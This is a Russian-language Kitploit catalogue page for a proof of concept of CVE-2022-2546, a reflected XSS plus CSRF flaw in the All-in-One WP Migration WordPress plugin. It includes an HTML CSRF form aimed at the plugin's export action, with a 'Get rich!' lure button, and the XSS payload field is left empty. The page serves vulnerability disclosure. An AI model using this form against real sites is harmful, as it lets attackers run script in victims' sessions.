Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-2546 — All-in-One WP Migration < 7.63 - Неаутентифицированная отражённая XSS + CSRF | Kitploit
Инструменты/GitHubGitHub/openxp-research/cve-2022-2546
Инструменты фишингаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubopenxp-research/cve-2022-2546

CVE-2022-2546

All-in-One WP Migration < 7.63 - Неаутентифицированная отражённая XSS + CSRF

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

All-in-One WP Migration < 7.63 - Неаутентифицированный отражённый XSS + CSRF

Описание

Плагин использует неправильный тип контента и не выполняет надлежащее экранирование ответа от действия ai1wm_export, что позволяет атакующему сформировать запрос, который при отправке любым посетителем внедрит произвольный HTML или JavaScript в ответ и выполнит его в сессии жертвы.

Доказательство концепции

Атакующий

Чтобы воспроизвести уязвимость, мы можем экспортировать весь контент сайта с помощью плагина и указать недопустимое имя в имени выходного файла.

ВИДЕО АТАКУЮЩЕГО

Подтвердив уязвимость, можно скомбинировать атаку с CSRF, что заставит браузер жертвы отправить запрос с полезной нагрузкой.

Жертва

ВИДЕО ЖЕРТВЫ

Код

root@kitploit:~
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
  <!--
    Note: The secret key must be obtained through other means.
    It is stored in the site option `ai1wm_secret_key`, but is
    static for the lifetime of the site.
  -->
  <input type="hidden" name="secret_key" value="[secret_key]">
  <input type="hidden" name="ai1wm_manual_export" value="1">
  <input type="hidden" name="archive" value="">

  <input type="submit" value="Get rich!">
</form>

Затронутые версии

All-in-One WP Migration < 7.63

Ссылки

Sucuri

WPScan

Hacking Force

Cross-Site Scripting (XSS)

Классификация

Тип: Cross-Site Scripting

OWASP TOP 10: A03:2021-Injection

CWE: CWE-79 Некорректная нейтрализация входных данных при генерации веб-страницы ('Cross-site Scripting')

Исследователи/Хакеры

Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) и Guilherme Acerbi (Ghost).

Скачать инструмент